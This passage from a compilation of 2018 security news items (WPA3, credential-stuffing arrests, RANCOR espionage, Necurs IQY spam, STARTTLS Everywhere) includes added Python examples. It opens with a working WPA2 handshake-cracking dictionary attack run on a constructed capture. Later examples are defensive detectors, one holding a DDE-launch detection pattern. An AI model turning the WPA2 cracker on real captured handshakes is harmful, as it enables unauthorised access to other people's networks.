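        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK and the four public values visible in the 4-way handshake."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_with_zeroed_mic: bytes) -> bytes:
    """WPA2/CCMP (AKM 00-0F-AC:2): MIC = HMAC-SHA1 over the EAPOL-Key frame, truncated
    to 16 bytes; the KCK is the first 16 bytes of the PTK."""
    return hmac.new(kck, eapol_with_zeroed_mic, hashlib.sha1).digest()[:16]


def offline_dictionary_attack(capture: dict, wordlist):
    """Test each guess entirely offline against the captured handshake; the AP is never contacted."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        ptk = derive_ptk(pmk, capture["ap_mac"], capture["client_mac"],
                         capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], capture["eapol"]), capture["mic"]):
            return candidate
    return None


# --- constructed "capture" (not from a real network): a WPA2 network with a weak passphrase ---
TRUE_PASSPHRASE = "summer2018!"
SSID = "HomeNet"
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("66778899aabb")
ANONCE = hashlib.sha256(b"constructed anonce").digest()
SNONCE = hashlib.sha256(b"constructed snonce").digest()
EAPOL_MSG2 = b"constructed EAPOL-Key message 2 with MIC field zeroed"
CAPTURE = {
    "ssid": SSID, "ap_mac": AP_MAC, "client_mac": CLIENT_MAC,
    "anonce": ANONCE, "snonce": SNONCE, "eapol": EAPOL_MSG2,
    # the MIC the client really sent, computed here from the true passphrase to build the capture
    "mic": eapol_mic(derive_ptk(pmk_from_passphrase(TRUE_PASSPHRASE, SSID),
                                AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16], EAPOL_MSG2),
}
WORDLIST = ["password", "letmein", "HomeNet123", "qwerty123", "summer2018!", "dragonfly"]

if __name__ == "__main__":
    print("recovered passphrase:", offline_dictionary_attack(CAPTURE, WORDLIST))
```

The cost of this attack is one PBKDF2 run per guess on hardware the attacker controls, which is why WPA2 security collapses to passphrase strength. Under SAE the PMK comes from the Dragonfly exchange rather than from PBKDF2 of the passphrase alone, so a guess can only be checked by running the exchange against the access point, which can rate-limit it, and learning the password later does not yield the session keys of captured traffic (forward secrecy).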

The Enterprise mode implements 192-bit encryption for networks that require extra security.

Both the Personal and Enterprise modes disallow legacy protocols and require Protected Management Frames (PMF), which protect management frames such as deauthentication against forgery.

Here is a summary of the most important improvements introduced by the new standard:

Protection Against Brute-Force Attacks
WPA3 provides enhanced protection against offline brute-force dictionary attacks, even when the users don’t choose complex passwords.

WPA3 Forward Secrecy
WPA3 provides forward secrecy to protect communications even if the attackers have compromised the password.

WPA3 strengthens user privacy in Public/Open Wi-Fi Networks
WPA3 improves user privacy in open networks through individualized data encryption: communications between a device and the Wi-Fi access point are encrypted so they cannot be passively eavesdropped.

The system protects connections against passive eavesdropping without requiring a password by using Opportunistic Wireless Encryption (OWE). It provides each user unique individual encryption that secures traffic between their device and the Wi-Fi network.

Enhanced protection for Critical Networks
Critical networks, such as the ones used in financial and government environments, are protected with 192-bit encryption.

WPA3 security standard

The Wi-Fi Alliance also announced Wi-Fi Easy Connect, a new feature that makes it easier for users to connect IoT devices to wireless networks.

Wi-Fi Easy Connect is a replacement for Wi-Fi Protected Setup (WPS), which has long been considered insecure. It lets a user onboard a new device by scanning a QR code with a smartphone, which then delivers the Wi-Fi credentials to the new smart device.


Russian police detained cybercriminals who broke into the accounts of 700,000 customers of popular Internet stores
27.6.2018 securityaffairs CyberCrime

The Ministry of Internal Affairs of the Russian Federation and Group-IB have detained cybercriminals who broke into the accounts of 700,000 customers of popular Internet stores
The Administration “K” of the MIA of Russia, with the assistance of Group-IB, an international company specializing in the prevention of cyberattacks and the development of information security products, detained two cybercriminals who were breaking into and stealing the accounts of loyalty program members from popular online stores, payment systems and bookmakers. In total, about 700,000 accounts were compromised, 2,000 of which the hackers put up for sale for $5 each. The detainees admitted on the spot that they had earned at least 500,000 rubles. However, the real amount of damage remains to be determined.

The investigation began in November 2015, after a large-scale cyberattack was made on the website of a large online store to gain access to the personal accounts of the store’s loyalty program members, who received bonuses for purchases. In a month, about 120,000 accounts were compromised.

Investigators found that the attackers had collected credentials leaked from various Internet services on hacker forums and used automated tools to try those login/password pairs against the online store's login page (credential stuffing).

The cybercriminals took advantage of the fact that many users reuse the same login/password pair across several services. Whenever a pair worked on the targeted store, they took over that personal account, checked the balance of accumulated bonuses and sold the compromised account on hacker forums for $5 or 20-30% of its nominal bonus balance. The buyers then used the accounts to pay for products with the bonuses.

It was quickly revealed that the hackers were engaged in more than selling compromised accounts. They also offered services for “hijacking” accounts—changing the phone number and e-mail on the accounts of the online store. The cost of that “service” was 10% of the bonus balance on the account.

To cover their tracks and hamper the companies’ security services, the hackers launched their attacks from different IP-addresses, using anonymizers and changing the digital fingerprint of the browser (User-Agent). In all, requests for authorization came from more than 35,000 unique IP addresses.
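An added detection example (not from Group-IB or the investigation): the Python below runs over a constructed authentication log and flags one-minute windows that look like the activity described above, many distinct accounts each tried about once, spread across many source IPs with rotating User-Agent strings, and a high failure rate. The log format, thresholds and addresses are the example's own assumptions; the sample also contains a single-account brute force to show why per-account or per-IP counters alone miss stuffing.

```python
import re
from collections import defaultdict

# Constructed log format (assumption): one line per login attempt.
LINE_RE = re.compile(
    r'^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\dZ) ip=(?P<ip>\S+) user=(?P<user>\S+) '
    r'result=(?P<result>ok|fail) ua="(?P<ua>[^"]*)"$'
)

# Thresholds are assumptions; tune them against the site's own baseline.
THRESHOLDS = {
    "min_users": 20,          # many different accounts tried ...
    "min_ips": 10,            # ... from many sources ...
    "max_per_ip": 3.0,        # ... each source sending only a few requests ...
    "min_failure_rate": 0.7,  # ... and most leaked pairs no longer valid here
}


def parse(lines):
    """Yield one dict per well-formed log line, in file order."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield m.groupdict()


def window_stats(events):
    """Aggregate the features that separate stuffing from other login traffic."""
    ips, users, uas = set(), set(), set()
    failures = 0
    for e in events:
        ips.add(e["ip"])
        users.add(e["user"])
        uas.add(e["ua"])
        failures += e["result"] == "fail"
    n = len(events)
    return {
        "attempts": n,
        "failure_rate": failures / n,
        "distinct_users": len(users),
        "distinct_ips": len(ips),
        "distinct_uas": len(uas),
        "attempts_per_ip": n / len(ips),
    }


def is_credential_stuffing(s, t=THRESHOLDS):
    """Stuffing looks unlike a brute force on one account (one user, one IP, many
    attempts) and unlike a user mistyping a password: accounts are each tried
    about once, from a rotating pool of IPs and User-Agents, mostly failing."""
    return (s["distinct_users"] >= t["min_users"]
            and s["distinct_ips"] >= t["min_ips"]
            and s["attempts_per_ip"] <= t["max_per_ip"]
            and s["failure_rate"] >= t["min_failure_rate"])


def detect(lines):
    """Return {minute: stats} for every one-minute window that matches."""
    buckets = defaultdict(list)
    for e in parse(lines):
        buckets[e["ts"][:16]].append(e)   # 'YYYY-MM-DDTHH:MM'
    flagged = {}
    for minute, events in buckets.items():
        stats = window_stats(events)
        if is_credential_stuffing(stats):
            flagged[minute] = stats
    return flagged


UAS = [
    "Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/47.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) Safari/601.3",
    "Mozilla/5.0 (X11; Linux x86_64) Firefox/43.0",
    "Opera/9.80 (Windows NT 6.1) Presto/2.12",
]


def constructed_log():
    """Constructed sample, not real traffic: a benign login, a single-account
    brute force, and a stuffing burst of 40 leaked pairs from 32 proxy IPs."""
    lines = [
        '2016-01-12T09:58:03Z ip=198.51.100.7 user=anna.k result=fail ua="%s"' % UAS[2],
        '2016-01-12T09:58:20Z ip=198.51.100.7 user=anna.k result=ok ua="%s"' % UAS[2],
    ]
    for i in range(15):   # one attacker hammering one account: not stuffing
        lines.append('2016-01-12T10:01:%02dZ ip=192.0.2.9 user=bob.s result=fail ua="%s"' % (i, UAS[0]))
    for i in range(40):   # each leaked pair tried once; a few still work because of password reuse
        result = "ok" if i % 13 == 0 else "fail"
        lines.append('2016-01-12T10:03:%02dZ ip=203.0.113.%d user=user%03d result=%s ua="%s"'
                     % (i, i % 32 + 1, i, result, UAS[i % 4]))
    return lines


if __name__ == "__main__":
    for minute, stats in detect(constructed_log()).items():
        print(minute, stats)
```

The successful logins inside a flagged window are the accounts to lock and re-verify; the failure rate alone would never reach a per-IP threshold here because each of the 32 proxies sends barely more than one request.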

After large retailers began to check all orders with payment bonuses carefully in early 2016, the hackers switched to other lesser-known online stores. In addition, the hackers began to work on tips—information about new online stores with bonus programs and coupon services where it was possible to access personal accounts, for which the attackers promised to pay up to 50% of the amount received from the further sale of the compromised accounts.

In the course of the investigation, Group-IB specialists established the identities of the intruders. The leader of the group was a resident of Ryazan Region, born in 1998, and his partner, who provided technical support for their joint online store, resided in Astrakhan Region and was born in 1997. In May 2018, both were detained by the Administration “K” of the MIA of Russia. During a search, evidence of their unlawful activities was seized, along with narcotics. The cybercriminals were charged under part 2 of article 272 (“Illegal Accessing of Computer Information “) and article 228 (“Illegal Acquisition, Storage, Transportation, … of Narcotic Drugs “) of the Criminal Code of the Russian Federation. The suspects have confessed. The investigation is continuing.


RANCOR Cyber Espionage Group Uncovered
26.6.2018 securityweek  CyberSpy

A cyber espionage group that has remained undetected until recently, has been targeting South East Asia with two previously unknown malware families, according to Palo Alto Networks.

The group, referred to as RANCOR, has been targeting political entities in Singapore, Cambodia, and Thailand, but might have hit targets in other countries as well. The group mainly uses two malware families, DDKONG and PLAINTEE, the latter apparently being a new addition to its arsenal.

According to Palo Alto's researchers, the attacks likely begin with spear-phishing emails carrying decoy documents that contain details taken from public news articles on political news and events. These documents are hosted on legitimate websites, including a website belonging to the Cambodian government, and on Facebook.

The newly discovered campaign appears related to the KHRAT Trojan, a backdoor associated with the China-linked cyber espionage group known as DragonOK.

One of the IP addresses that the KHRAT-associated domains started resolving to in February 2018 led the researchers to websites mimicking popular technology companies, including one named facebook-apps[.]com. The researchers connected two malware samples to that domain, namely a loader and PLAINTEE.

Only six samples of the malware were found, and the researchers managed to link them to two infrastructure clusters that do not appear to overlap. Both clusters, however, were involved in attacks targeting organizations in South East Asia, and the malware was observed using the same file paths in each cluster.

At least one of the attacks used a Microsoft Office Excel document with an embedded macro to launch the payload. The main malicious code was embedded in an EXIF metadata property of the document. In another attack, an HTML Application file (.hta) was used, while other attacks used DLL loaders.

One of the DLLs downloaded a decoy from a government website that was previously used in a KHRAT attack and two DLLs (out of three) were found hosted on this same compromised website (the domain was likely hacked again in early 2018).

First observed in February 2017, the DDKONG malware might be used by multiple threat actors.

First observed in October 2017, PLAINTEE appears to be exclusively used by the RANCOR attackers. The malware uses a custom UDP protocol for its network communications, can add persistence on the victim machine, ensures only a single instance is running, and then starts collecting general system information.

The malware also beacons to the command and control (C&C) server and attempts to decode a configuration blob. After the server responds, the malware spawns several new threads to load and execute a new plugin that is to be received from the C&C in the form of a DLL with an export function of either ‘shell’ or ‘file’.

The researchers believe the attackers were sending commands to the malware manually, due to a long period of delay between these commands (automated commands are performed quicker).

“The RANCOR campaign represents a continued trend of targeted attacks against entities within the South East Asia region. In a number of instances, politically motivated lures were used to entice victims into opening and subsequently loading previously undocumented malware families. These families made use of custom network communication to load and execute various plugins hosted by the attackers,” Palo Alto concludes.


Window Snyder Joins Intel as Chief Software Security Officer
26.6.2018 securityweek IT

Intel on Monday announced that Window Snyder has joined the company’s Software and Services Group as chief software security officer, vice president and general manager of the Intel Platform Security Division.

The decision, effective July 9, comes after Intel was forced to rethink its cybersecurity strategy following the disclosure of the Spectre and Meltdown vulnerabilities early this year, and less than one week after the chip giant announced the resignation of Brian Krzanich as CEO and member of the board of directors.

Snyder has worked in the cybersecurity industry for two decades, including as senior security strategist at Microsoft, co-founder of Matasano, security chief at Mozilla, and security and privacy product manager at Apple. Prior to joining Intel, she was Fastly’s chief security officer for three years.

“In this role with Intel, Window will be responsible for ensuring the company maintains a competitive security product roadmap across all segments in support of business group objectives and continues to engage with the external security ecosystem to apply industry trends and sensing to Intel roadmap differentiation,” said Doug Fisher, senior vice president and general manager of the Software and Services Group at Intel.

Specifically, according to Fisher, Snyder will be responsible – among other things – for working with operating system developers and the security industry to ensure that the company is informed on attacks, to help guide its response, to deliver differentiated security capabilities for data and workloads, and to “drive scale for security.”


Eight Arrested for Roles in Email Fraud Schemes
26.6.2018 securityweek Crime

Eight individuals were arrested for their roles in a widespread, Africa-based business email compromise (BEC) conspiracy, the United States Department of Justice announced on Monday.

Following Operation WireWire earlier this month, a new international effort named "Operation Keyboard Warrior" resulted in five individuals being arrested in the United States, along with three others in Ghana. Four more were indicted for their roles in the schemes but remain at large.

BEC is a type of fraud that targets people in decision-making positions within organizations via email, phone, or fax, in order to hijack wire transfers or trick them into authorizing payments for fake invoices.

Tens of thousands have fallen victim to BEC schemes, and losses amount to billions. Victims include accounts payable personnel at Fortune 500 companies, global maritime shipping companies and their customers, and more.

As part of Operation Keyboard Warrior, the DoJ coordinated with international law enforcement to disrupt online frauds perpetrated from Africa. The criminal operation, which has been ongoing since at least 2012, allegedly defrauded U.S. companies and citizens of around $15 million, the Justice Department says.

The individuals arrested in the U.S. are Javier Luis Ramos Alonso, 28, a Mexican citizen residing in Seaside, California; James Dean, 65, of Plainfield, Indiana; Dana Brady, 61, of Auburn, Washington; Rashid Abdulai, 24, a Ghanaian citizen residing in the Bronx, New York, and Olufolajimi Abegunde, 31, a Nigerian citizen residing in Atlanta, Georgia.

Maxwell Atugba Abayeta aka Maxwell Peter, 26, and Babatunde Martins, 62, of Ghana and Benard Emurhowhoariogho Okorhi, 39, a Nigerian citizen who resides in Ghana, were arrested overseas and await their extradition. Sumaila Hardi Wumpini, 29; Dennis Miah, 34; Ayodeji Olumide Ojo, 35, and Victor Daniel Fortune Okorhi, 35, who were also charged in the indictment, remain at large.

The defendants are charged with conspiracy to commit wire fraud, wire fraud, conspiracy to commit money laundering, conspiracy to commit computer fraud, and aggravated identity fraud.

According to the indictment, the Africa-based co-conspirators committed, or caused to be committed, intrusions into the servers and email systems of a Memphis-based real estate company in June and July 2016.

The defendants used spoofed email addresses and Virtual Private Networks to identify large financial transactions, engage in fraudulent email correspondence with the relevant business parties, and redirect closing funds, through a network of U.S.-based money mules, to Africa. The scheme defrauded companies and individuals in Memphis of hundreds of thousands of dollars.

According to the indictment, some of the Africa-based defendants also engaged in various romance scams, fraudulent-check scams, gold-buying scams, advance-fee scams, and credit card scams. All the proceeds of these criminal activities were shipped and/or transferred from the United States to locations in Ghana, Nigeria, and South Africa.

Some of the defendants are also said to have been concealing their conduct by, among other means, “stealing or fraudulently obtaining personal identification information (PII) and using that information to create fake online profiles and personas,” the DoJ announcement reads.

“The defendants allegedly unleashed a barrage of international fraud schemes that targeted U.S. businesses and individuals, robbing them to the tune of approximately $15 million,” Acting Assistant Attorney General John P. Cronan of the Justice Department’s Criminal Division said.


Security Startup Quantum Xchange Promises Unbreakable Quantum-Safe Encryption
26.6.2018 securityweek  Crypto

Quantum Xchange Raises $10 Million, Launches Quantum Key Distribution Service

Bethesda, MD-based start-up Quantum Xchange has announced $10 million in Series A funding from New Technology Ventures, and the launch of the first commercial quantum key distribution (QKD) service in the U.S. The funding will support the deployment of a fiber network serving the Northeast Corridor from Washington D.C. to Boston, connecting the financial markets on Wall Street with back office operations in New Jersey.

The business premise is simple. The budding arrival of quantum computers will make today's strong public key encryption immensely weak. Where factoring the large numbers behind current key lengths would take classical computers too long, or too many of them, to be feasible, a single quantum computer could factor them in a matter of minutes. Public key encryption will not provide security against quantum computers.

Quantum computing is not yet viable -- but it is getting closer every month. Within the last fortnight (15 June 2018), Microsoft blogged, "Microsoft is 'all-in' on building a quantum computer and is making advancements 'every day'."

"Quantum computers," explained Julie Love, director of quantum computing at Microsoft, "could solve a set of problems that are completely intractable to humans at this time, and it could do so in 100 seconds." Microsoft is so confident in its progress that it has already released a Quantum Development Kit for developers.

Quantum Xchange's president and CEO John Prisco told SecurityWeek that we cannot wait for the arrival of commercial quantum computing before we make plans to defend data in transit from quantum computing decryption. Sensitive data can be stolen and stored by both cyber criminals and nation states. While current encryption will keep that data safe from malicious eyes, within a relatively few years the encryption will be broken courtesy of qubit computing and become available to the attackers.

"Nation-states and other nefarious agents have been stockpiling encrypted data for years waiting for the arrival of technology to decode it," warns David Monahan, managing research director at Enterprise Management Associates. "Quantum computers capable of breaking existing SSL encryption may only be a few years away. The time to prepare for this eventuality is now. Organizations without a well-articulated quantum risk management plan will fall behind, and lose business to, those that do."

Quantum key distribution is the only provable way to keep encryption secure both now and in the future -- even against the power of quantum computers. It works at the quantum mechanics level, using photons of light to transfer a shared secret between two entities via a fiber connection. The nature of photons means that they cannot be intercepted without disturbing the quantum state. If this were to happen, it would be detected and the communication abandoned. The protection is based on the laws of physics rather than the power of mathematics.

The Quantum Xchange network is simply a very secure communication system using complex quantum laws of physics. It only operates over dark fiber, which is plentiful in the U.S. Network service providers have been laying down more fiber than they currently require for years.

Quantum Xchange adds the distance-enhancing Trusted Node technology developed by Battelle -- which it exclusively owns -- to quantum keys generated by QKD devices from ID Quantique -- for which it has an exclusive U.S. licensing agreement. The combination, transmitted across plentiful U.S. dark fiber, allows the QKD range to be extended indefinitely in 100-mile multiples.

"ID Quantique's QKD solutions have been working robustly in the field, securing Swiss elections for over a decade," comments Gregoire Ribordy, CEO and co-founder of ID Quantique. "Other long-term customers include banks, governments and enterprises worldwide. Quantum Xchange's model to provide end-to-end quantum keys on demand in the US will ensure easy accessibility for such customers to the highest levels of data protection, with inbuilt eavesdropping detection and forward security."

Quantum Xchange is launching its QKD system in the U.S. Northeast, crossing the financial and government powerhouse of the nation from Washington D.C. to Boston. Its great strength, however, is that distance is no longer a problem, and the firm plans to spread the QKD network across the nation.

"Quantum computing is emerging, and the availability of large-scale quantum computers is on the horizon," says Eric Hay, senior systems engineer at Quantum Xchange in a paper (PDF) published in March 2018. "The threat posed by quantum computing however, is here and now. QKD offers the most complete, secure solution that can be implemented today to secure data from the threat of quantum computing. Because the security is based on physics, not complex math, there is no threat from advances in computing, quantum or otherwise, that will break QKD."


Sophos Patches Privilege Escalation Flaws in SafeGuard Products
26.6.2018 securityweek Vulnerability

Researchers discovered several vulnerabilities in Sophos SafeGuard full-disk and file encryption products. The flaws allow an attacker to escalate privileges on a compromised device and execute arbitrary code with SYSTEM permissions.

A total of seven local privilege escalation vulnerabilities have been identified by researchers at Nettitude. The security holes can be exploited via various IOCTL calls using specially crafted input buffers that allow attackers to control the execution path.

Nettitude has published technical details for each of the flaws, along with a video showing how an attacker with access to the targeted device can escalate privileges to SYSTEM.

According to an advisory published on Tuesday by Sophos, the vulnerabilities affect various versions of SafeGuard Enterprise Client, SafeGuard Easy and SafeGuard LAN Crypt for Windows. The bugs have been assigned the CVE identifiers CVE-2018-6851 through CVE-2018-6857.

“Sophos is not aware of any attacks leveraging those vulnerabilities or exploits for them being available,” the security firm wrote in its advisory. “Exploitation of those vulnerabilities requires running malicious code on the target machine and can result in privilege escalation. This vulnerability is not remotely exploitable (i.e. over the network).”

The vulnerabilities were reported to Sophos in January and patches were created in April. Sophos has advised users to install the available patches.


EFF Secures Email Delivery With STARTTLS Everywhere
26.6.2018 securityweek  Safety

The Electronic Frontier Foundation (EFF) this week announced STARTTLS Everywhere, a new project aimed at improving the security of email delivery.

The EFF is already involved in initiatives aimed at encrypting the web, such as the Let’s Encrypt Certificate Authority, and is now determined to advance email encryption in a manner similar to that of browsing.

Designed for mailserver admins, STARTTLS Everywhere provides software that allows email servers to automatically obtain a valid certificate from Let’s Encrypt. It also helps admins configure their email server software to use STARTTLS and to present that valid certificate to other email servers.

What’s more, STARTTLS Everywhere features a “preload list” of email servers that have promised to support STARTTLS, thus making it easy to detect downgrade attacks.

“The net result: more secure email, and less mass surveillance,” EFF says.

An extension to SMTP, STARTTLS allows email servers to establish encrypted communication channels with one another, thus delivering email messages securely, without exposing data to anyone listening to the network traffic.

Unlike PGP and S/MIME, which deliver end-to-end encryption, STARTTLS only offers hop-to-hop encryption (hops are the computers an email goes through before reaching its destination), which means that mail providers can read emails if no additional protection is in place.

“Thus, STARTTLS is not a replacement for secure end-to-end solutions. Instead, STARTTLS allows email service providers and administrators to provide a baseline measure of security against outside adversaries,” EFF explains.

Thanks to various efforts over the past few years, effective STARTTLS encryption now stands at 89%, according to Google's Email Transparency Report. Five years ago, it was at only 39%.

However, even though many mailservers enable STARTTLS, most still do not validate certificates, which allows attackers to impersonate them and to access or spoof messages that are sent over supposedly secure connections.

“As a result, the ecosystem is stuck in a sort of chicken-and-egg problem: no one validates certificates because the other party often doesn’t have a valid one, and the long tail of mailservers continue to use invalid certificates because no one is validating them anyway,” EFF notes.

What’s more, even if a server supports STARTTLS and uses a valid certificate, there is no guarantee the communication will be encrypted, because the initial data exchange between servers isn’t encrypted and an attacker on the path can block the establishment of a secure connection. Both servers then believe the other doesn’t support STARTTLS, which results in a downgrade attack.

Without encryption, emails are delivered over the Simple Mail Transfer Protocol, or SMTP, which does not protect messages and allows anyone on the network to read their contents. Thus, not only is sniffing one’s emails an easy task, but mass surveillance also becomes possible.

With the new initiative, EFF wants to increase adoption of STARTTLS, to increase the number of mailservers that actually validate certificates, and also to prevent downgrade attacks on email services.

For mailserver admins, a technical deep dive into STARTTLS Everywhere is available.
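To make the preload-list idea concrete, here is an added example (not EFF's STARTTLS Everywhere code) of how a sending MTA could combine a destination's EHLO reply with a preload policy: for a listed domain in "enforce" mode, a missing STARTTLS capability or an unexpected MX host is treated as a downgrade or impersonation attempt rather than as a capability gap. The policy layout below is a simplified, assumed form of the published list, and the EHLO replies are constructed samples.

```python
"""Decide how an outbound MTA should treat a destination domain, given the
destination's EHLO reply and a STARTTLS Everywhere-style preload policy.

Added example, not EFF's code. Assumptions (labelled):
  * PRELOAD_POLICY is a simplified, constructed form of the preload list:
    domain -> {"mode": "enforce" | "testing", "mxs": [names or ".suffix"]};
  * the EHLO replies passed to decide() are constructed multi-line 250 replies.
"""
from enum import Enum
from typing import Dict, List, Optional, Set


class Action(Enum):
    ENCRYPT_AND_VERIFY = "use STARTTLS and verify the certificate against policy MXs"
    OPPORTUNISTIC = "use STARTTLS if offered, otherwise fall back to plaintext"
    PLAINTEXT = "plaintext delivery: no STARTTLS offered and no policy for the domain"
    ABORT_DOWNGRADE = "abort: policy requires TLS but STARTTLS was not offered"
    ABORT_MX_MISMATCH = "abort: MX host is not listed in the domain's policy"


# Constructed preload policy (assumption: simplified layout, not the real list).
PRELOAD_POLICY: Dict[str, dict] = {
    "example.com": {"mode": "enforce", "mxs": ["mx1.example.com", ".example.com"]},
    "testing.example.org": {"mode": "testing", "mxs": ["mx.example.org"]},
}


def parse_ehlo_capabilities(ehlo_reply: str) -> Set[str]:
    """Return the capability keywords advertised in a multi-line 250 EHLO reply.

    Continuation lines look like "250-STARTTLS"; the final line uses a space,
    e.g. "250 8BITMIME". The first 250 line is the greeting and is skipped.
    """
    caps: Set[str] = set()
    first = True
    for line in ehlo_reply.splitlines():
        if not line.startswith("250"):
            continue
        if first:
            first = False
            continue
        body = line[4:].strip()
        if body:
            caps.add(body.split()[0].upper())
    return caps


def mx_matches(mx_host: str, allowed: List[str]) -> bool:
    """Match an MX host against policy entries: exact names or ".suffix" wildcards."""
    host = mx_host.lower().rstrip(".")
    for entry in allowed:
        e = entry.lower()
        if e.startswith("."):
            if host.endswith(e):
                return True
        elif host == e:
            return True
    return False


def decide(domain: str, mx_host: str, ehlo_reply: str,
           policy: Optional[Dict[str, dict]] = None) -> Action:
    """Choose a delivery action for one (domain, MX host, EHLO reply) triple."""
    policy = PRELOAD_POLICY if policy is None else policy
    offered = "STARTTLS" in parse_ehlo_capabilities(ehlo_reply)
    rule = policy.get(domain.lower())
    if rule is None or rule.get("mode") != "enforce":
        # Unknown domain, or a policy still in "testing": log only, never refuse.
        return Action.OPPORTUNISTIC if offered else Action.PLAINTEXT
    if not mx_matches(mx_host, rule["mxs"]):
        return Action.ABORT_MX_MISMATCH
    if not offered:
        # The domain promised STARTTLS; its absence is a downgrade, not a capability gap.
        return Action.ABORT_DOWNGRADE
    return Action.ENCRYPT_AND_VERIFY


if __name__ == "__main__":
    # Constructed EHLO replies: one advertising STARTTLS, one with it stripped.
    ok = "250-mx1.example.com Hello relay\r\n250-SIZE 52428800\r\n250-STARTTLS\r\n250 8BITMIME"
    stripped = "250-mx1.example.com Hello relay\r\n250-SIZE 52428800\r\n250 8BITMIME"
    print(decide("example.com", "mx1.example.com", ok).value)
    print(decide("example.com", "mx1.example.com", stripped).value)
```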


Recent spam campaigns powered by Necurs use Internet Query File attachments
26.6.2018 securityaffairs Spam

Trend Micro experts reported the Necurs botnet has been using Internet Query (IQY) files in recent spam campaigns to bypass security protections.
The Necurs botnet, composed of millions of infected computers worldwide, is currently the largest spam botnet. It has been active since at least 2012 and has been involved in massive campaigns spreading malware such as the Locky ransomware, the Scarab ransomware, and the Dridex banking Trojan.

Necurs was inactive for a long period at the beginning of 2017 and resumed its activity in April, when it was observed using a new technique to avoid detection.

In the campaign observed in April, the botmasters leveraged .URL files with modified icons to deceive recipients and trick them into believing they were opening a different file type.

Necurs has now adopted a new tactic to avoid detection: its operators leverage IQY files, plain text files in a specific format that let users import data from external sources into Excel documents, and which Windows automatically opens in Excel.

The campaigns using IQY file attachments feature subject and file names containing terms that refer to sales promotions, offers, and discounts.

“The new wave of spam samples has IQY file attachments. The subject and attachment file contains terms that refer to sales promotions, offers, and discounts, likely to disguise it as the type of information opened in Excel.” reads the report published by Trend Micro.

Once executed, the IQY file queries the URL in its code to fetch data and insert it into an Excel worksheet.

The fetched data contains a script that exploits Excel’s Dynamic Data Exchange (DDE) feature to execute a command line and launch a PowerShell process, which runs a remote PowerShell script directly in the memory of the target system.

The script downloads a Trojanized remote access application and the final payload, the FlawedAMMYY backdoor. The backdoor borrows the code of the Ammyy Admin remote access Trojan.

In recent attacks, the script was used to download an image file before the final payload. The image is a disguised malware downloader that fetches an encrypted component file containing the same backdoor routines.

“The PowerShell script enables the download of an executable file, a trojanized remote access application, and its final payload: the backdoor FlawedAMMYY (detected as BKDR_FlawedAMMYY.A). This backdoor appears to have been developed from the leaked source code of the remote administration software called Ammyy Admin.” continues the analysis.

“In a more recent spam wave, the script downloads an image file before the final payload. The downloaded image is a disguised downloader malware (detected as BKDR_FlawedAMMYY.DLOADR) that downloads an encrypted component file (detected as BKDR_FlawedAMMYY.B) containing the same main backdoor routines.”

FlawedAMMYY implements common backdoor features: it allows attackers to manage files, capture the screen, remotely control the machine, establish RDP sessions and much more.

The extra layer of evasion implemented in Necurs makes the botnet even more insidious, as explained by the experts.

“Adding this new layer of evasion to Necurs poses new challenges because web queries generally come in the form of plaintext files, which makes the attached IQY file’s URL the only indication of malware activity. In addition, its structure is the same as normal Web Queries. Therefore, a security solution that blocks malicious URLs could be used to defend against this threat,” Trend Micro concludes.

Experts highlighted that users receive two warning messages upon execution of the IQY file attachment; for this reason, it is essential to pay attention to those warnings in order to neutralize the attack.
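Since the report notes that an IQY attachment is plain text with the same structure as a legitimate web query, the URL is the one thing a mail gateway can act on. The following added example (not Trend Micro's or Necurs' code) parses the IQY layout, flags query hosts that are not on an allow list, and separately checks fetched cell data for the DDE "application|topic!item" launch shape the article describes; the IQY layout, the allow list and all sample inputs are assumptions or constructed samples.

```python
"""Parse Excel Internet Query (.iqy) attachments and flag the external URL
they would make Excel fetch; also detect the DDE launch shape in fetched data.

Added example, not Trend Micro's or Necurs' code. Assumptions (labelled):
  * IQY layout: line 1 "WEB", line 2 "1" (version), line 3 the URL, then
    optional "Key=Value" settings such as Selection=AllTables;
  * ALLOWED_HOSTS is a placeholder for the hosts a gateway trusts for queries.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set
from urllib.parse import urlparse

# Placeholder allow list (assumption): internal hosts legitimately queried from Excel.
ALLOWED_HOSTS: Set[str] = {"intranet.example.internal"}

# DDE formula shape "=app|topic!item" (the article's DDE command-line launch).
_DDE_LAUNCH = re.compile(r"^\s*=\s*[A-Za-z]\w*\s*\|.*!\w+", re.S)


@dataclass
class IqyReport:
    url: Optional[str]
    settings: Dict[str, str] = field(default_factory=dict)
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def parse_iqy(text: str) -> IqyReport:
    """Return the query URL and settings from an IQY file body.

    Blank lines are ignored; anything that does not start with a WEB header
    is reported as malformed rather than guessed at.
    """
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    report = IqyReport(url=None)
    if len(lines) < 3 or lines[0].upper() != "WEB":
        report.reasons.append("not a WEB query (unexpected header or too short)")
        return report
    report.url = lines[2]
    for ln in lines[3:]:
        key, _, value = ln.partition("=")
        report.settings[key.strip()] = value.strip()
    return report


def assess_iqy(text: str, allowed_hosts: Set[str] = ALLOWED_HOSTS) -> IqyReport:
    """Parse the attachment and record why a gateway should block or sandbox it."""
    report = parse_iqy(text)
    if report.url is None:
        return report
    parsed = urlparse(report.url)
    host = (parsed.hostname or "").lower()
    if parsed.scheme not in ("http", "https"):
        report.reasons.append(f"unexpected URL scheme {parsed.scheme!r}")
    if not host:
        report.reasons.append("query URL has no host")
    elif host not in allowed_hosts:
        report.reasons.append(f"external query host {host!r} is not on the allow list")
    return report


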